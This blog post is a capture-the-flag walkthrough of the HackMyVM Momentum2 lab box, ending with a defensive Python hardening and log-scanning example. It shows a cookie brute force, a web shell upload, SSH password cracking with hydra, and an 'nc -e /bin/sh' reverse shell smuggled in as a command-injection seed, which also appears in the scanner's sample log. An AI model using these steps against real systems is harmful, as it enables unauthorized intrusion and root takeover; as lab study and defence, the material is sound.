Windy's little blog

Odds and ends of everyday life, and I like CTF.

HackMyVm Momentum2 Walkthrough

Scan ports.

 nmap -sV -sC -p-  -oN ports.log
 Starting Nmap 7.91 ( ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumerate the web server on port 80 with gobuster.

 gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [-->]
 /css                  (Status: 301) [Size: 314] [-->]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [-->]
 /js                   (Status: 301) [Size: 313] [-->]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [-->]

Check ajax.php.bak. The backup shows that we need to set a specific cookie and a POST parameter before the upload of a PHP file is accepted.

 cat ajax.php.bak
     //The boss told me to add one more Upper Case letter at the end of the cookie
     if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
         //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
         $valid_ext = array("txt");
     // Remember success upload returns 1

Generate a dictionary file of candidate cookies, one for each possible trailing upper-case letter.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php with a web shell in it.

 cat cmd.php

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with Burp Suite.

Send the request to Repeater, add the cookie "admin=xxx" (the value will be brute-forced later) and add the parameter "secure=val1d". Note that the value is val1d with a digit one, not valid. If we click Send now, the response is 0, which means the upload failed.

Then send it to Intruder and mark the cookie value as the payload position: admin=§xxxxx§.

Set the payload to the cookie.txt we just generated.

Click Start attack. The request that returns response 1 reveals the right cookie.

And cmd.php has been uploaded to /owls.

Check that cmd.php works.

 ~ curl ''    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can get a reverse shell.

 curl ''
 nc -nlvp 1234
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder, we find a password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

The [Asterisk] placeholder stands for one unknown character, so we generate a dictionary with crunch: @ covers lower-case letters, % digits, , upper-case letters and ^ symbols.

 crunch 16 16 -t myvulnerableapp@ > dic.txt
 crunch 16 16 -t myvulnerableapp% >> dic.txt
 crunch 16 16 -t myvulnerableapp, >> dic.txt
 crunch 16 16 -t myvulnerableapp^ >> dic.txt

Brute-force SSH with the username athena and this dictionary.

 hydra -l athena -P dic.txt ssh -f
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 Hydra ( starting at 2021-05-31 15:26:17
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
 [DATA] attacking ssh://
 [22][ssh] host:   login: athena   password: myvulnerableapp*

SSH in as athena and check sudo privileges.

 athena@momentum2:~$ sudo -l
 Matching Defaults entries for athena on momentum2:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User athena may run the following commands on momentum2:
     (root) NOPASSWD: /usr/bin/python3 /home/team-tasks/

Run the Python file as root via sudo; when it asks for the seed, enter a shell command instead, since the seed is passed to a shell unsanitized.

 sudo python3 /home/team-tasks/ 
 ~ Random Cookie Generation ~
 [!] for security reasons we keep logs about cookie seeds.
 Enter the seed : ;nc 1234 -e /bin/sh;

Listen on that port in another terminal and get a root shell.

 nc -nvlp 1234
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 uid=0(root) gid=0(root) groups=0(root)
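The root step works because the seed string ends up in a shell command. As an added example that is not the VM's own script, here is what a hardened version of such a cookie generator looks like, plus a small scanner a defender could run over the seed log the script says it keeps (the log format and the sample entries are constructed assumptions):

```python
"""Hardened cookie-seed generator and seed-log scanner (example, not from the VM)."""
import hashlib
import re
import secrets

# Allow-list: a seed is plain alphanumeric and bounded in length.
SEED_RE = re.compile(r"^[A-Za-z0-9]{1,64}$")
# Shell metacharacters and tool names that have no business in a cookie seed.
SUSPICIOUS_RE = re.compile(r"[;&|`$<>]|\$\(|\b(nc|bash|sh|python)\b")


def is_safe_seed(seed: str) -> bool:
    """True only if the seed matches the allow-list; ';nc ... -e /bin/sh;' is rejected."""
    return bool(SEED_RE.match(seed))


def generate_cookie(seed: str) -> str:
    """Derive a 32-hex-char cookie from the seed without ever invoking a shell.

    A random salt is mixed in so the same seed does not always yield the same cookie.
    """
    if not is_safe_seed(seed):
        raise ValueError("seed rejected: only [A-Za-z0-9]{1,64} is allowed")
    salt = secrets.token_bytes(16)
    return hashlib.sha256(salt + seed.encode()).hexdigest()[:32]


def suspicious_seed_log_lines(log_text: str) -> list:
    """Return seed-log entries whose seed field looks like a command-injection attempt."""
    hits = []
    for line in log_text.splitlines():
        seed = line.split("seed=", 1)[1] if "seed=" in line else line
        if SUSPICIOUS_RE.search(seed):
            hits.append(line)
    return hits


# Constructed sample log; the format and the IP are assumptions, not the VM's real log.
SAMPLE_LOG = """2021-05-31 15:31:02 user=athena seed=abc123
2021-05-31 15:31:40 user=athena seed=;nc 10.0.0.5 1234 -e /bin/sh;
2021-05-31 15:32:01 user=athena seed=$(id)
"""

if __name__ == "__main__":
    print(is_safe_seed("abc123"), is_safe_seed(";nc 10.0.0.5 1234 -e /bin/sh;"))
    print(generate_cookie("abc123"))
    for hit in suspicious_seed_log_lines(SAMPLE_LOG):
        print("ALERT:", hit)
```

The same allow-list check also removes the need to run the script as root at all, which is the other half of the fix: the sudo rule grants root to whatever the script does with its input.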